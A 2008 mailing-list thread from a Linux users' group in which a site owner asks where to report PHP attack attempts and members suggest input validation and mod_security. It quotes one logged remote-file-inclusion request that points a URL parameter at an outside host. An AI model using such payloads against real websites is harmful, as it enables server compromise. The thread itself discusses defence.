Hi Joshua, I was hoping to find a place I could report these attempted exploits. Something like the spam email RBL's. If it does not exist, I wonder why.
I do appreciate everyones input on how to secure our server and our code. ------------------------ Keith Smith --- On Wed, 12/3/08, Joshua Zeidner <[EMAIL PROTECTED]> wrote: From: Joshua Zeidner <[EMAIL PROTECTED]> Subject: Re: OT: Website Exploits To: [EMAIL PROTECTED], "Main PLUG discussion list" <[email protected]> Date: Wednesday, December 3, 2008, 6:23 PM Am I the only one who noticed that you *did not* ask how to secure your site? ;) -jmz On Wed, Dec 3, 2008 at 6:17 PM, keith smith <[EMAIL PROTECTED]> wrote: It is a custom site. Basically one page does it all. Depending on what parameters/arguments are used in the URL will depend on what content is displayed. I setup a switch to test the URL parameters against know values. If no know value is entered to defaults to the 404 page. I'm thinking that is pretty secure. ------------------------ Keith Smith --- On Wed, 12/3/08, Lisa Kachold <[EMAIL PROTECTED]> wrote: From: Lisa Kachold <[EMAIL PROTECTED]> Subject: RE: OT: Website Exploits To: [EMAIL PROTECTED], [email protected] Date: Wednesday, December 3, 2008, 5:14 PM What index.php are you using? Is this WordPress? http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00030.html There are many php exploits: http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00031.html www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452 Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona Department of Economic Security will provide a one hour presentation on forensics. Date: Wed, 3 Dec 2008 14:57:35 -0800 From: [EMAIL PROTECTED] Subject: Re: OT: Website Exploits To: [email protected] Thank you for the heads up on mod_security. I'm not sure if that is installed or not. Thanks again! ------------------------ Keith Smith --- On Wed, 12/3/08, JD Austin <[EMAIL PROTECTED]> wrote: From: JD Austin <[EMAIL PROTECTED]> Subject: Re: OT: Website Exploits To: [EMAIL PROTECTED], "Main PLUG discussion list" <[email protected]> Date: Wednesday, December 3, 2008, 3:48 PM That is a fairly common tactic. It exploits poor input validation and register globals in PHP. Do yourself a huge favor and install mod_security (I assume you're using apache?) as an extra measure of security if you haven't already. On Wed, Dec 3, 2008 at 3:39 PM, keith smith <[EMAIL PROTECTED]> wrote: Hi, I am working on a website that gets a lot of exploit attempts. They mostly look like this: /index.php?display=http://humano.ya.com/mysons/index.htm? Our code is set to disregard any value that is not expected. I'm wondering if there is a clearing house for reporting this type of stuff. I have the IP address as reported.... if that is accurate. Thanks in advance! Keith --------------------------------------------------- PLUG-discuss mailing list - [email protected] To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --------------------------------------------------- PLUG-discuss mailing list - [email protected] To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss Send e-mail anywhere. No map, no compass. Get your Hotmail® account now. --------------------------------------------------- PLUG-discuss mailing list - [email protected] To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --------------------------------------------------- PLUG-discuss mailing list - [email protected] To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --------------------------------------------------- PLUG-discuss mailing list - [email protected] To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
--------------------------------------------------- PLUG-discuss mailing list - [email protected] To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
